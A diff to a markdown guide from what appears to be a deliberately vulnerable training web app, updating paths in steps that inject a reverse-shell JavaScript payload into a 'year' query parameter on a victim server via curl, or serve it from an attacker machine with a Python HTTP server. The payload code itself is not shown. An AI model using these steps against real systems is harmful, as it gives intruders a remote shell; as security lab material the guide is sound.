tatumroaquin/vwa-ssji/payload/Linux/Linux.md

 ### Method 1 - Copy Paste
 Copy the contents of the [revshell.js](./revshell.js) file.
 ```
-xclip -in payload/revshell.js -selection clipboard
+xclip -in payload/Linux/revshell.js -selection clipboard
 ```
 And paste the contents of [revshell.js](revshell.js) into the `year` HTTP GET Query
 ```
 curl -G --data-urlencode "year=<payload>" http://<victim-ip>:3000
 ```
 ### Method 2 - Server/Client
-Host a server in the `payload` directory from the hacker machine
+Host a server in the `payload/Linux` directory from the hacker machine
 ```
-cd payload
+cd payload/Linux
 python -m http.server 5000
 ```
 Then use cURL to inject the payload to the victim web server